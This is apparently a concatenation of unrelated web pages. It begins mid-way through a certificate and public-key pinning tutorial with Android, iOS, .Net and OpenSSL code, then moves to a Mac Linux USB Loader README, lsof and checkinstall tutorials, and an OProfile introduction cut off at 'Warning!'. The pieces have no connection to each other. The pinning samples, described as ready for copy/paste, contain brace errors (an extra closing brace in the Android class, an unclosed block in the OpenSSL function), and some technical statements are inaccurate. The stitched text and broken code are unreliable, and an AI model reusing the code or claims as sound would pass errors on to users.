  • A path validation check. The check verifies all the signatures on certificates in the chain are valid under a given PKI. The check begins at the server or service’s certificate (the leaf), and proceeds back to a trusted root certificate (the root).
  • A validity check, or the notBefore and notAfter fields. The notAfter field is especially important since a CA will not warrant the certificate after the date, and it does not have to provide CRL/OCSP updates after the date.
  • Revocation status. As with notAfter, revocation is important because the CA will not warrant a certificate once it is listed as revoked. The IETF approved way of checking a certificate’s revocation is OCSP and specified in RFC 2560.

Optional Checks

[Mulling over what else to present, and the best way to present it. Subject name? DNS lookups? Key Usage? Algorithms? Geolocation based on IP? Check back soon.] In the model which pre-dated PKIX RFC-5280, X.509v1 there was strong binding of the certificate Subject name to the X.500 Directory. With the update to X.509v3, the Directory is still the standard for authentication of caCertificate attributes, versus accepting a self signed root. Geo-location is important, the fake certificate for Google was given a location of Florida, instead of Mountain View, CA. The binding of the certificate to the Directory can anchor the root caCertificate, in effect “pin” it, to a valid entity that can have demonstrable attributes such as location. This is detailed in RFC-1255. Additional fields specified, such as the subject alternative field, for example a RFC-822 email address, or DNS name, can be located in the DNS, but the actual heavy lifting is done by the X.500 Directory, which is used currently as a cross-certificate trust conduit at the Federal Bridge between major communities of interest, that are not Internet focused. While those cross-certificates are valuable in validation between trust communities, a self-signed root, still needs to be either pinned, curated in trust bundle such as in web browser software secure storage or represented by a federated community. The Directory can play a role to fill in gaps to validate caCertificates, either locally, or nationally under an administrative domain such as c=US. By divorcing the subject from the Directory entry, problems begin to arise in which pinning plays a key role to ensure that client and server have the same reference points.

Public Key Checks

Quod vide (q.v.). Verifying the identity of a host with knowledge of its associated/expected public key is pinning.

Examples of Pinning

This section demonstrates certificate and public key pinning in Android Java, iOS, .Net, and OpenSSL. All programs attempt to connect torandom.org and fetch bytes (Dr. Mads Haahr participates in AOSP’s pinning program, so the site should have a static key). The programs enjoy a pre-existing relationship with the site (more correctly, a priori knowledge), so they include a copy of the site’s public key and pin the identity on the key.

Parameter validation, return value checking, and error checking have been omitted in the code below, but is present in the sample programs. So the sample code is ready for copy/paste. By far, the most uncomfortable languages are C-based: iOS and OpenSSL.

HTTP pinning

RFC 7469 introduced a new HTTP header that allows SSL servers to declare hashes of their certificates with time scope in which these certificates should not be changed. For example:

      Public-Key-Pins: max-age=2592000;
      pin-sha256="E9CZ9INDbd+2eRQozYqqbQ2yXLVKB9+xcprMF+44U1g=";
      pin-sha256="LPJNul+wow4m6DsqxbninhsWHlwfp0JecwQzYpOLmCQ=";
      report-uri="http://example.com/pkp-report"

Please note that RFC 7469 is controversial since it allows overrides for locally installed authorities. That is, it allows an adversary or other party who successfully phishes the user to override a known good pinset with non-authentic or fraudulent information. Second, the reporting mechanism is suppressed from broken pinsets, so a complying user agent will be complicit in the cover up after the fact. That is, the reporting of the broken pinset is called out as MUST NOT report [1].

Android

Pinning in Android is accomplished through a custom X509TrustManager. X509TrustManager should perform the customary X509 checks in addition to performing the pin.

Download: Android sample program

public final class PubKeyManager implements X509TrustManager
{
  private static String PUB_KEY = "30820122300d06092a864886f70d0101" +
    "0105000382010f003082010a0282010100b35ea8adaf4cb6db86068a836f3c85" +
    "5a545b1f0cc8afb19e38213bac4d55c3f2f19df6dee82ead67f70a990131b6bc" +
    "ac1a9116acc883862f00593199df19ce027c8eaaae8e3121f7f329219464e657" +
    "2cbf66e8e229eac2992dd795c4f23df0fe72b6ceef457eba0b9029619e0395b8" +
    "609851849dd6214589a2ceba4f7a7dcceb7ab2a6b60c27c69317bd7ab2135f50" +
    "c6317e5dbfb9d1e55936e4109b7b911450c746fe0d5d07165b6b23ada7700b00" +
    "33238c858ad179a82459c4718019c111b4ef7be53e5972e06ca68a112406da38" +
    "cf60d2f4fda4d1cd52f1da9fd6104d91a34455cd7b328b02525320a35253147b" +
    "e0b7a5bc860966dc84f10d723ce7eed5430203010001";

  public void checkServerTrusted(X509Certificate[] chain, String authType) throws CertificateException
  {
    if (chain == null) {
      throw new IllegalArgumentException("checkServerTrusted: X509Certificate array is null");
    }

    if (!(chain.length > 0)) {
      throw new IllegalArgumentException("checkServerTrusted: X509Certificate is empty");
    }

    if (!(null != authType && authType.equalsIgnoreCase("RSA"))) {
      throw new CertificateException("checkServerTrusted: AuthType is not RSA");
    }

    // Perform customary SSL/TLS checks
    try {
      TrustManagerFactory tmf = TrustManagerFactory.getInstance("X509");
      tmf.init((KeyStore) null);
      
      for (TrustManager trustManager : tmf.getTrustManagers()) {
        ((X509TrustManager) trustManager).checkServerTrusted(chain, authType);
      }
    } catch (Exception e) {
      throw new CertificateException(e);
    }

    // Hack ahead: BigInteger and toString(). We know a DER encoded Public Key begins
    // with 0x30 (ASN.1 SEQUENCE and CONSTRUCTED), so there is no leading 0x00 to drop.
    RSAPublicKey pubkey = (RSAPublicKey) chain[0].getPublicKey();
    String encoded = new BigInteger(1 /* positive */, pubkey.getEncoded()).toString(16);

    // Pin it!
    final boolean expected = PUB_KEY.equalsIgnoreCase(encoded);
    if (!expected) {
      throw new CertificateException("checkServerTrusted: Expected public key: "
                + PUB_KEY + ", got public key:" + encoded);
      }
    }
  }
}

PubKeyManager would be used in code similar to below.

TrustManager tm[] = { new PubKeyManager() };

SSLContext context = SSLContext.getInstance("TLS");
context.init(null, tm, null);

URL url = new URL( "https://www.random.org/integers/?" +
                   "num=16&min=0&max=255&col=16&base=10&format=plain&rnd=new");

HttpsURLConnection connection = (HttpsURLConnection) url.openConnection();
connection.setSSLSocketFactory(context.getSocketFactory());

InputStreamReader instream = new InputStreamReader(connection.getInputStream());
StreamTokenizer tokenizer = new StreamTokenizer(instream);
...

iOS

iOS pinning is performed through a NSURLConnectionDelegate. The delegate must implementconnection:canAuthenticateAgainstProtectionSpace: and connection:didReceiveAuthenticationChallenge:. Withinconnection:didReceiveAuthenticationChallenge:, the delegate must call SecTrustEvaluate to perform customary X509 checks.

Download: iOS sample program.

-(IBAction)fetchButtonTapped:(id)sender
{
    NSString* requestString = @"https://www.random.org/integers/?
        num=16&min=0&max=255&col=16&base=16&format=plain&rnd=new";
    NSURL* requestUrl = [NSURL URLWithString:requestString];

    NSURLRequest* request = [NSURLRequest requestWithURL:requestUrl
                                             cachePolicy:NSURLRequestReloadIgnoringLocalCacheData
                                         timeoutInterval:10.0f];

    NSURLConnection* connection = [[NSURLConnection alloc] initWithRequest:request delegate:self];
}

-(BOOL)connection:(NSURLConnection *)connection canAuthenticateAgainstProtectionSpace:
                  (NSURLProtectionSpace*)space
{
    return [[space authenticationMethod] isEqualToString: NSURLAuthenticationMethodServerTrust];
}

- (void)connection:(NSURLConnection *)connection didReceiveAuthenticationChallenge:
                   (NSURLAuthenticationChallenge *)challenge
{
  if ([[[challenge protectionSpace] authenticationMethod] isEqualToString: NSURLAuthenticationMethodServerTrust])
  {
    do
    {
      SecTrustRef serverTrust = [[challenge protectionSpace] serverTrust];
      if(nil == serverTrust)
        break; /* failed */

      OSStatus status = SecTrustEvaluate(serverTrust, NULL);
      if(!(errSecSuccess == status))
        break; /* failed */

      SecCertificateRef serverCertificate = SecTrustGetCertificateAtIndex(serverTrust, 0);
      if(nil == serverCertificate)
        break; /* failed */

      CFDataRef serverCertificateData = SecCertificateCopyData(serverCertificate);
      [(id)serverCertificateData autorelease];
      if(nil == serverCertificateData)
        break; /* failed */

      const UInt8* const data = CFDataGetBytePtr(serverCertificateData);
      const CFIndex size = CFDataGetLength(serverCertificateData);
      NSData* cert1 = [NSData dataWithBytes:data length:(NSUInteger)size];

      NSString *file = [[NSBundle mainBundle] pathForResource:@"random-org" ofType:@"der"];
      NSData* cert2 = [NSData dataWithContentsOfFile:file];

      if(nil == cert1 || nil == cert2)
        break; /* failed */

      const BOOL equal = [cert1 isEqualToData:cert2];
      if(!equal)
        break; /* failed */

      // The only good exit point
      return [[challenge sender] useCredential: [NSURLCredential credentialForTrust: serverTrust]
                    forAuthenticationChallenge: challenge];
    } while(0);

    // Bad dog
    return [[challenge sender] cancelAuthenticationChallenge: challenge];
}

.Net

.Net pinning can be achieved by using ServicePointManager as shown below.

Download: .Net sample program.

// Encoded RSAPublicKey
private static String PUB_KEY = "30818902818100C4A06B7B52F8D17DC1CCB47362" +
    "C64AB799AAE19E245A7559E9CEEC7D8AA4DF07CB0B21FDFD763C63A313A668FE9D764E" +
    "D913C51A676788DB62AF624F422C2F112C1316922AA5D37823CD9F43D1FC54513D14B2" +
    "9E36991F08A042C42EAAEEE5FE8E2CB10167174A359CEBF6FACC2C9CA933AD403137EE" +
    "2C3F4CBED9460129C72B0203010001";

public static void Main(string[] args)
{
  ServicePointManager.ServerCertificateValidationCallback = PinPublicKey;
  WebRequest wr = WebRequest.Create("https://encrypted.google.com/");
  wr.GetResponse();
}

public static bool PinPublicKey(object sender, X509Certificate certificate, X509Chain chain,
                                SslPolicyErrors sslPolicyErrors)
{
  if (null == certificate)
    return false;

  String pk = certificate.GetPublicKeyString();
  if (pk.Equals(PUB_KEY))
    return true;

  // Bad dog
  return false;
}

OpenSSL

Pinning can occur at one of two places with OpenSSL. First is the user supplied verify_callback. Second is after the connection is established via SSL_get_peer_certificate. Either method will allow you to access the peer’s certificate.

Though OpenSSL performs the X509 checks, you must fail the connection and tear down the socket on error. By design, a server that does not supply a certificate will result in X509_V_OK with a NULL certificate. To check the result of the customary verification: (1) you must callSSL_get_verify_result and verify the return code is X509_V_OK; and (2) you must call SSL_get_peer_certificate and verify the certificate is non-NULL.

Download: OpenSSL sample program.

int pkp_pin_peer_pubkey(SSL* ssl)
{
    if(NULL == ssl) return FALSE;
    
    X509* cert = NULL;
    FILE* fp = NULL;
    
    /* Scratch */
    int len1 = 0, len2 = 0;
    unsigned char *buff1 = NULL, *buff2 = NULL;
    
    /* Result is returned to caller */
    int ret = 0, result = FALSE;
    
    do
    {
        /* http://www.openssl.org/docs/ssl/SSL_get_peer_certificate.html */
        cert = SSL_get_peer_certificate(ssl);
        if(!(cert != NULL))
            break; /* failed */
        
        /* Begin Gyrations to get the subjectPublicKeyInfo       */
        /* Thanks to Viktor Dukhovni on the OpenSSL mailing list */
        
        /* http://groups.google.com/group/mailing.openssl.users/browse_thread/thread/d61858dae102c6c7 */
        len1 = i2d_X509_PUBKEY(X509_get_X509_PUBKEY(cert), NULL);
        if(!(len1 > 0))
            break; /* failed */
        
        /* scratch */
        unsigned char* temp = NULL;
        
        /* http://www.openssl.org/docs/crypto/buffer.html */
        buff1 = temp = OPENSSL_malloc(len1);
        if(!(buff1 != NULL))
            break; /* failed */
        
        /* http://www.openssl.org/docs/crypto/d2i_X509.html */
        len2 = i2d_X509_PUBKEY(X509_get_X509_PUBKEY(cert), &temp);

        /* These checks are verifying we got back the same values as when we sized the buffer.      */
        /* Its pretty weak since they should always be the same. But it gives us something to test. */
        if(!((len1 == len2) && (temp != NULL) && ((temp - buff1) == len1)))
            break; /* failed */
        
        /* End Gyrations */
        
        /* See the warning above!!!                                            */
        /* http://pubs.opengroup.org/onlinepubs/009696699/functions/fopen.html */
        fp = fopen("random-org.der", "rx");
        if(NULL ==fp) {
            fp = fopen("random-org.der", "r");
        
        if(!(NULL != fp))
            break; /* failed */
        
        /* Seek to eof to determine the file's size                            */
        /* http://pubs.opengroup.org/onlinepubs/009696699/functions/fseek.html */
        ret = fseek(fp, 0, SEEK_END);
        if(!(0 == ret))
            break; /* failed */
        
        /* Fetch the file's size                                               */
        /* http://pubs.opengroup.org/onlinepubs/009696699/functions/ftell.html */
        long size = ftell(fp);

        /* Arbitrary size, but should be relatively small (less than 1K or 2K) */
        if(!(size != -1 && size > 0 && size < 2048))
            break; /* failed */
        
        /* Rewind to beginning to perform the read                             */
        /* http://pubs.opengroup.org/onlinepubs/009696699/functions/fseek.html */
        ret = fseek(fp, 0, SEEK_SET);
        if(!(0 == ret))
            break; /* failed */
        
        /* Re-use buff2 and len2 */
        buff2 = NULL; len2 = (int)size;
        
        /* http://www.openssl.org/docs/crypto/buffer.html */
        buff2 = OPENSSL_malloc(len2);
        if(!(buff2 != NULL))
            break; /* failed */
        
        /* http://pubs.opengroup.org/onlinepubs/009696699/functions/fread.html */
        /* Returns number of elements read, which should be 1 */
        ret = (int)fread(buff2, (size_t)len2, 1, fp);
        if(!(ret == 1))
            break; /* failed */
        
        /* Re-use size. MIN and MAX macro below... */
        size = len1 < len2 ? len1 : len2;
        
        /*************************/
        /*****    PAYDIRT    *****/
        /*************************/
        if(len1 != (int)size || len2 != (int)size || 0 != memcmp(buff1, buff2, (size_t)size))
            break; /* failed */
        
        /* The one good exit point */
        result = TRUE;
        
    } while(0);
    
    if(fp != NULL)
        fclose(fp);
    
    /* http://www.openssl.org/docs/crypto/buffer.html */
    if(NULL != buff2)
        OPENSSL_free(buff2);
    
    /* http://www.openssl.org/docs/crypto/buffer.html */
    if(NULL != buff1)
        OPENSSL_free(buff1);
    
    /* http://www.openssl.org/docs/crypto/X509_new.html */
    if(NULL != cert)
        X509_free(cert);
    
    return result;
}

Pinning Alternatives

Not all applications use split key cryptography. Fortunately, there are protocols which allow you to set up a secure channel based on knowledge of passwords and pre-shared secrets (rather than putting the secret on the wire in a basic authentication scheme). Two are listed below – SRP and PSK. SRP and PSK have 88 cipher suites assigned to them by IANA for TLS, so there’s no shortage of choices.

Figure 3: IANA reserved cipher suites for SRP and PSK

SRP

Secure Remote Password (SRP) is a Password Authenticated Key Exchange (PAKE) by Thomas Wu based upon Diffie-Hellman. The protocol is standardized in RFC 5054 and available in the OpenSSL library (among others). In the SRP scheme, the server uses a verifier which consists of a{salt, hash(password)} pair. The user has the password and receives the salt from the server. With lots of hand waving, both parties select per-instance random values (nonces) and execute the protocol using g{(salt + password)|verifier} + nonces rather than traditional Diffie-Hellman using gab.

P=NP!!!

Diffie-Hellman based schemes are part of a family of problems based on Discrete Logs (DL), which are logarithms over a finite field. DL schemes are appealing because they are known to be hard (unless P=NP, which would cause computational number theorists to have a cow).

PSK

PSK is Pre-Shared Key and specified in RFC 4279 and RFC 4764. The shared secret is used as a pre-master secret in TLS-PSK for SSL/TLS; or used to key a block cipher in EAP-PSK. EAP-PSK is designed for authentication over insecure networks such as IEEE 802.11.

Miscellaneous

This sections covers administrivia and miscellaneous items related to pinning.

Ephemeral Keys

Ephemeral keys are temporary keys used for one instance of a protocol execution and then thrown away. An ephemeral key has the benefit of providing forward secrecy, meaning a compromise of the site or service’s long term (static) signing key does not facilitate decrypting past messages because the key was temporary and discarded (once the session terminated).

Ephemeral keys do not affect pinning because the Ephemeral key is delivered in a separate ServerKeyExchange message. In addition, the ephemeral key is a key and not a certificate, so it does not change the construction of the certificate chain. That is, the certificate of interest will still be located at certificates[0].

Pinning Gaps

There are two gaps when pinning due to reuse of the existing infrastructure and protocols. First, an explicit challenge is not sent by the program to the peer server based on the server’s public information. So the program never knows if the peer can actually decrypt messages. However, the shortcoming is usually academic in practice since an adversary will receive messages it can’t decrypt.

Second is revocation. Clients don’t usually engage in revocation checking, so it could be possible to use a known bad certificate or key in a pinset. Even if revocation is active, Certificate Revocation Lists (CRLs) and Online Certificate Status Protocol (OCSP) can be defeated in a hostile environment. An application can take steps to remediate, with the primary means being freshness. That is, an application should be updated and distributed immediately when a critical security parameter changes.

No Relationship ^@$!

If you don’t have a pre-existing relationship, all is not lost. First, you can pin a host or server’s certificate or public key the first time you encounter it. If the bad guy was not active when you encountered the certificate or public key, he or she will not be successful with future funny business.

Second, bad certificates are being spotted quicker in the field due to projects like Chromium and Certificate Patrol, and initiatives like the EFF’sSSL Observatory.

Third, help is on its way, and there are a number of futures that will assist with the endeavors:

  • Public Key Pinning (http://www.ietf.org/id/draft-ietf-websec-key-pinning-09.txt) – an extension to the HTTP protocol allowing web host operators to instruct user agents (UAs) to remember (“pin”) the hosts’ cryptographic identities for a given period of time.
  • DNS-based Authentication of Named Entities (DANE) (https://datatracker.ietf.org/doc/rfc6698/) – uses Secure DNS to associate Certificates with Domain Names For S/MIME, SMTP with TLS, DNSSEC and TLSA records.
  • Sovereign Keys (http://www.eff.org/sovereign-keys) – operates by providing an optional and secure way of associating domain names with public keys via DNSSEC. PKI (hierarchical) is still used. Semi-centralized with append only logging.
  • Convergence (http://convergence.io) – different [geographical] views of a site and its associated data (certificates and public keys). Web of Trust is used. Semi-centralized.

While Sovereign Keys and Convergence still require us to confer trust to outside parties, the parties involved do not serve share holders or covet revenue streams. Their interests are industry transparency and user security.

More Information?

Pinning is an old new thing that has been shaken, stirred, and repackaged. While “pinning” and “pinsets” are relatively new terms for old things, Jon Larimer and Kenny Root spent time on the subject at Google I/O 2012 with their talk Security and Privacy in Android Apps.

Format Conversions

As a convenience to readers, the following with convert between PEM and DER format using OpenSSL.

# Public key, X509
$ openssl genrsa -out rsa-openssl.pem 3072
$ openssl rsa -in rsa-openssl.pem -pubout -outform DER -out rsa-openssl.der
# Private key, PKCS#8
$ openssl genrsa -out rsa-openssl.pem 3072
$ openssl pkcs8 -nocrypt -in rsa-openssl.pem -inform PEM -topk8 -outform DER -out rsa-openssl.der

References

Mac Linux USB Loader


Mac Linux USB Loader

Tool allowing you to put a Linux distribution on a USB drive and make it bootable on Intel Macs using EFI.

Mac Linux USB Loader logo

General Information

This is the Mac Linux USB Loader, a tool allowing you to take an ISO of a Linux distribution and make it boot using EFI. It requires a single USB drive formatted as FAT with at least 2 GB free recommended. Mac Linux USB Loader is available under the 3-clause BSD license.

The tool is necessary to make certain Linux distributions boot that do not have EFI booting support. Many distributions are adding this with the release of Windows 8, but it has not been finalized and is still nonstandard by most distributions. Many common distributions are supported, like Ubuntu and Linux Mint.

If you wish to contribute to the code or fork the repository, please do so. All development currently takes place on the master branch, and this is where code should be submitted for pull requests. The legacybranch contains the code for pre-3.0 versions of Mac Linux USB Loader; it will not be maintained and is present for historical interest only.

I created this tool, if you care, for several reasons:

  • None of the other tools available (esp. unetbootin) feel native and operate as you would expect on the Mac platform.
  • None of the other methods of which I am aware have the ability to make the archives boot on Intel Macs.
  • It was personally a pain in the neck getting Linux distributions to boot via USB on Macs.

That being said, it does have a few shortcomings:

  • Linux fails to have graphics on some Macs (i.e Macbook Pros with nVidia graphics), which in some cases prevents boot, but this is not necessarily an issue with Mac Linux USB Loader as much as it is an issue with the video drivers that ship with most distributions. Luckily, with Enterprise, which has been included with Mac Linux USB Loader since 2.0, you can use persistence to install the necessary video drivers on distributions like Ubuntu, helping to alleviate the issue.

Building from Source

Requirements: Xcode 6, OS X 10.10 SDK. OS X 10.8+ required to run built app

  1. Clone from git: git clone https://github.com/SevenBits/Mac-Linux-USB-Loader.git
  2. Run pod install (requires Cocoapods).
  3. Open Mac Linux USB Loader.xcworkspace and do an archive build, or simply run and debug it with Xcode

Acknowledgements

  • Used some icons from KDE’s Oxygen. link
  • Special thanks to Leander Lismond for translating the application into Dutch!

More information can be found on: https://github.com/SevenBits/Mac-Linux-USB-Loaderhttps://sevenbits.github.io/Mac-Linux-USB-Loader/https://github.com/SevenBits/Mac-Linux-USB-Loader/wiki

Linux super-duper admin tools: lsof


lsof is one of the more important tools you can use on your Linux box. Its name is somewhat misleading. lsof stands for lisopen files, but the term files fails to impact the true significance of power. That is, unless you remember the fundamental lesson, in Linux everything is a file.

We have had several super-duper admin articles, focusing around tools that help us understand better the behavior of our system, try to identify performance bottlenecks and solve issues that do not have an apparent, immediate presence in the logs. Save for vague, indirect symptoms, you might be struggling to understand what is happening under the hood.

Teaser

lsof, alongside strace and OProfile, is another extremely versatile, powerful weapon in the arsenal of a system administrator and the curious engineer. Used correctly, it can yield a wealth of information about your machine, helping you narrow down the problem solving and maybe even expose the culprit.

So let’s see what this cool tool can do.

Why is lsof so important?

I did say lsof is important, but I did not say why. Well, the thing is, with lsof you can do pretty much anything. It encompasses the functionality of numerous other tools that you may be familiar with.

For example, lsof can provide the same information netstat offers. You can use lsof to find mounts on your machine, so it supplements both /etc/mtab and /proc/mounts. You can use lsof to learn what open files a processes holds. In general, pretty much anything you can find under the /proc filesystem, lsof can display in a very simple, centric manner, without writing custom scripts for looping through the sub-directories and parsing and filtering content.

lsof allows you to display information for particular users, processes, show only traffic for certain network protocols, file handles, and more. Used effectively, it’s the Swiss Knife of admin utilities.

lsof in action

A few demonstrations are in order.

Run without any parameters, lsof will display all of the information for all of the files. At this point, I should reiterate the fact there are many types of files. While most uses treat their music and Office documents as files, the generic description goes beyond that. Devices, sockets, pipes, and directories are also files.

lsof output explained

Before we dig in, let’s take a look at a basic output:

Basic usage

Command is the name of the process. It also includes kernel threads. PID is the process ID. USER is the owner of the process. FD is the first truly interesting field.

The FD stands for File Descriptor, an abstract indicator for accessing of files. File descriptors are indexes in kernel data structures called file descriptor tables, which contain details of all open files. Each process has its file descriptor table. User applications that wish to read and write to files will instead read to and write from file descriptors using system calls. The exact type of the file descriptor will determine what the read and write operations really mean.

In our example, we have several different values of FD listed. If you have ever looked under the /proc filesystem and examined the structure of a process, some of the entries will be familiar. For instance, cwdstands for Current Working Directory of the listed process. txt is the Text Segment or the Code Segment (CS), the bit of the object containing executable instructions, or program code if you will. mem stands for Data Segments and Shared Objects loaded into the memory. 10u refers to file descriptor 10, open for both reading and writing. rtd stands for root directory.

As you can see, you need to understand the output, but once you get the hang of it, it’s a blast. lsof provides a wealth of information, formatted for good looks, without too much effort. Now, it’s up to you to put the information to good use.

The fifth column, TYPE is directly linked to the FD column. It tells us what type of file we’re working with. DIR stands for directory. REG is a regular file or a page in memory. FIFO is a named pipe. Symbolic links, sockets and device files (block and character) are also file types. unknown means that the FD descriptor is of unknown type and locked. You will encounter these only with kernel threads.

For more details, please read the super-extensive man page.

Now, we’re already having a much better picture of what lsof tells us. For instance, 10u is a pipe used by initctl, a process control initialization utility that facilitates the startup of services during bootup. All in all, it may not mean anything at the moment, but if and when you have a problem, the information will prove useful.

The DEVICE column tells us what device we’re working on. The two numbers are called major and minor numbers. The list is well known and documented. For instance, major number 8 stands for SCSI block device. For comparison, IDE disks have a major number 3. The minor number indicates one of the 15 available partitions. Thus (8,1) tell us we’re working on sda1.

(0,16), the other interesting device listed refers to unnamed, non-device mounts.

For detailed list, please see:

http://www.kernel.org/pub/linux/docs/device-list/devices.txt

SIZE/OFF is the file size. NODE is the Inode number. Name is the name of the file. Again, do not be confused. Everything is a file. Even your computer monitor, only it has a slightly different representation in the kernel.

Now, we know everything. OK, unfiltered output is too much to digest in one go. So let’s start using some flags for smart filtering of information.

Per process

To see all the open files a certain process holds, use -p:

lsof -p <pid>

lsof -p

Per user

Similarly, you can see files per user using the -u flag:

lsof -u <name>

lsof -u

File descriptors

You can see all the processes holding a certain fie descriptor with -d <number>:

lsof -d <number>

lsof -d 3

This is very important if you have hung NFS mounts or blocked processes in uninterruptible sleep (D state) refusing to go away. Your only way to start solving the problem is do dig into lsof and trace down the dependencies, hopefully finding processes and files that can be killed and closed. Alternatively, you can also display all the open file descriptors:

Rising number

Notice that the number is rising in sequence. In general, Linux kernel will give the first available file descriptor to a process asking for one. The convention calls for file descriptors 0, 1 and 2 to be standard input (STDIN), standard output (STDOUT) and standard error (STDERR), so normally, file descriptor allocation will start from 3.

If you’ve ever wondered what we were doing when we devnull-ed both the standard output and the standard error in the strace examples, this ought to explain it. We had the following:

something > /dev/null 2>&1

In other words, we redirected standard output to /dev/null, and then we redirected file descriptor 2 to 1, which means standard error goes to standard output, which itself is redirected to the system black hole.

Finding file descriptors can be quite useful, especially if some applications are hard-coding their use, which can lead to problems and conflicts. But that’s a different story altogether.

One more thing notable from the above screenshot are the unix and CHR FD types, which we have not yet seen. unix stands for UNIX domain socket, an interprocess communication socket, similar to Internet sockets, only without using a network protocol. CHR stands for a character device. Character devices allow the transmission of a single bit of data; typical examples are terminals, keyboard, mouse, and similar peripherals, where the order of data is critical.

Do not confuse domain sockets with classic sockets, which is an end-point consisting of an IP address and a port.

Netstat-like behavior

lsof can also provide lots of information similar and identical to netstat. You can dump the listing of all files and then grep for relevant information, like LISTEN, ESTABLISHED, IPV4, or any other network related term.

netstat

Internet protocols & ports

Specifically, lsof can also show you the open ports for either IPv4 or IPv6 protocols, much like nmap scan against the localhost:

lsof -i<protocol>

lsof -i

Directory search

lsof also supports a number of flags that are enabled with + and disabled with – signs, rather than the typical use of single or double dash (-) characters as option separators.

One of these is +d (and +D), which lets you show all the processes holding a certain directory. The capital D also lets you recurse and expands all the files in the directory and its sub-directories, whereas lower d will just show the directories and no files.

lsof +d <dir name> or lsof +D <dirname>

Dir search

Practical example

I’ve given you two juicy examples when I wrote the strace tutorial. I skimped a bit with OProfile, because finding simple and relevant problems that can be quickly demonstrated with a profiler tool are not easy to come by – but do not despair, there shall be an article.

Now, lsof allows a plenty of demo space. So here’s one.

How do you handle a stuck mount?

Let’s say you have a mount that refuses to go down. And you don’t really know what’s wrong. For some reason, it won’t let you unmount it.

df

/proc/mounts

You tried the umount command, but it does not really work:

Busy

Luckily for you, openSUSE recommends using lsof, but let’s ignore that for a moment.

Anyhow, your mount won’t come down. In desperation and against better judgment, you also try forcing the unmounting of the mount point with -f flag, but it still does not help. Not only the mount is refusing to let go, you may have also corrupted the /etc/mtab file by issuing the force mount command. Just some food for thought.

Now, how do you handle this?

The hard way

If you’re experienced and know your way about /proc, then you can do the following:

Under /proc, examine the current working directories and file descriptors holding the mount point. Then, examine the process table and see what the offending processes are and if they can be killed.

ls -l /proc/*/cwd | grep just

cwd

Furthermore:

ls -l /proc/*/fd | grep just

fd

Finally, in our example:

ps -ef | grep -E ‘10878|10910’

ps

And problem solved …

Note: sometimes, especially if you have problems with mounts or stuck processes, lsof may not be the best tool, as it too may get stuck trying to recurse. In these delicate cases, you may want to use the -n and -l flags. -n inhibits the conversion of network IP addresses to domain names, making lsof work faster and avoids lockups due to name lookup not working properly. -l inhibits conversion of user IDs to names, quite useful if name lookup is working slowly or improperly, including problems with nscd daemon, connectivity to NIS, LDAP or whatever, and other issues. However, sometimes, in extreme cases, going for /proc may be the most sensible option.

The easy (and proper) way

By the book, using lsof ought to do it:

lsof | grep just

lsof just

And problem solved. Well, we still need to free the mount by closing or killing the process and the files held under the mount point, but we know what to do. Not only do we get all the information we need, we do this quickly, efficiently.

Knowing the alternative methods is great, but you should always start smart and simple, with lsof, exploring, narrowing down possibilities and converging on the root cause.

I hope you liked it.

Conclusion

There you go,a wealth of information about lsof and what it can do for you. I bet you won’t easily find detailed explanation about lsof output elsewhere, although examples about the actual usage are aplenty. Well, my tutorial provides you with both.

Now, the big stuff is ahead of you. Using lsof to troubleshoot serious system problems, without wasting time going through /proc and trying to find relevant system information, when it’s all there, hidden under just one mighty command.

checkinstall – Smartly manage your installations


The best way to install applications in Linux is by using the package managers. It’s the simplest, safest and most foolproof way of obtaining and maintaining the programs you need. You install them using a friendly and intuitive interface and you uninstall them using the same interface. The dependencies are automatically solved. The program revision is tracked. Whenever you can, use the package manager to get what you need.

There are many package managers available – and they come in two forms: the core utility, which is command-line and the front-end (GUI), which calls on the command-line tool to do the job. In openSUSE, you have the YaST/zypper combo, in Ubuntu, you have Synaptic/apt, in Fedora, you have Pirut/yum, and so forth.

Teaser

But sometimes, the program you want will not be found in the repositories, even the extras ones like Medibuntu or RPMForge. You will have to download the sources and compile them and install your package manually.

The problem with this approach is that your manually installed programs will not be visible in your package manager. They won’t show up, nor be available for upgrades or removal, creating a potential clutter/security issue for you, especially if there are many such programs you must use.

Luckily for you, there’s a solution: a utility that can package the sources into installer files that your package manager will recognize and be able to catalog. This utility is called checkinstall.

Enter checkinstall

checkinstall works by functioning as a wrapper for your typical installation from sources. It will follow after the third stage in the configure, make, make install chain and keep track of every change made to the system. Once the installation is done, it will create a package compatible with your package management. checkinstall works with RPM, Debian and Slackware packages, covering a rather large install base.

OK, let’s see this thing in action!

Install checkinstall

The first thing is: install checkinstall. A sort of a chicken and an egg problem. You should probably use your package manager to get checkinstall installed.

Install

Install program from source

Your next step is to find the application you want to install, which is not found in the repositories. This is not an east task nowadays. I spent quite a bit of time hunting for a program that I want. Eventually, I settled forGuake, a Quake-like drop-down terminal utility. Please note that it DOES exist in the repositories, but it was a good choice as any.

So I started the usual chain, with configure and make …

configure

make

Please note that these two steps may fail, depending on the configuration of your system. Some of your libraries may be missing, outdated or too new for the sources you’re trying to compile. Then, the sources themselves might be written badly, with errors and whatnot.

But assuming that everything went smoothly, your next step is to invoke checkinstall as root (or sudo):

checkinstall

Run checkinstall

A short wizard will guide you through the installation & package creation process. If the package documentation directory does not exist, it will ask you to create one.

You will then have the opportunity to write your own documentation:

Documentation

Then comes the installation and the creation of the package. You can change the options if you like. Normally, I would not recommend changing any of the values unless you really know what you’re doing.

Debian package

And soon, you will have the program installed:

Installed

You can even check in your package manager now, to see whether the package is listed and installed as expected. Yup, there it is! Notice our very own documentation!

In package manager

And the application in the menu:

Menu

From now on, the manually installed program is just like any other program. Your package manager will maintain it, sparing you the grueling manual work. Excellent!

Conclusion

checkinstall is a great addition to the Linux user’s arsenal of handy tools, especially experienced users with peculiar taste for non-conventional installations of programs not readily available in the repositories. It allows you to easily keep track and order of all your applications, whether they come as package installers or from sources.

Linux super-duper admin tools: OProfile


It’s time to step up the geeky fun a notch and learn about OProfile.

Teaser

OProfile is a Linux system-wide profiling tool that you can use to, uh, profile and analyze performance and runtime problems with your applications, or even the kernel itself. It’s very simple to use and does not require any special preparations. No need to patch the kernel or use debug symbols. Just insert the module and start running.

OProfile uses the hardware performance counters of the CPU to enable profiling of a wide variety of statistics, which you can then use for profiling of the kernel and your applications. In fact, OProfile works with everything, including hardware and software interrupt handlers, kernel modules, the kernel, shared libraries, and applications.

After you’ve collected the data you need, you can run reports against it, even produce graphs showing you a vizualization of the profiled runs.

For more details, please read the Novell Cool Solutions OProfile article and visit the official website, where you can find lots of useful information about the tool, including its numerous features and advantages.

Now, let’s use it.

Warning!

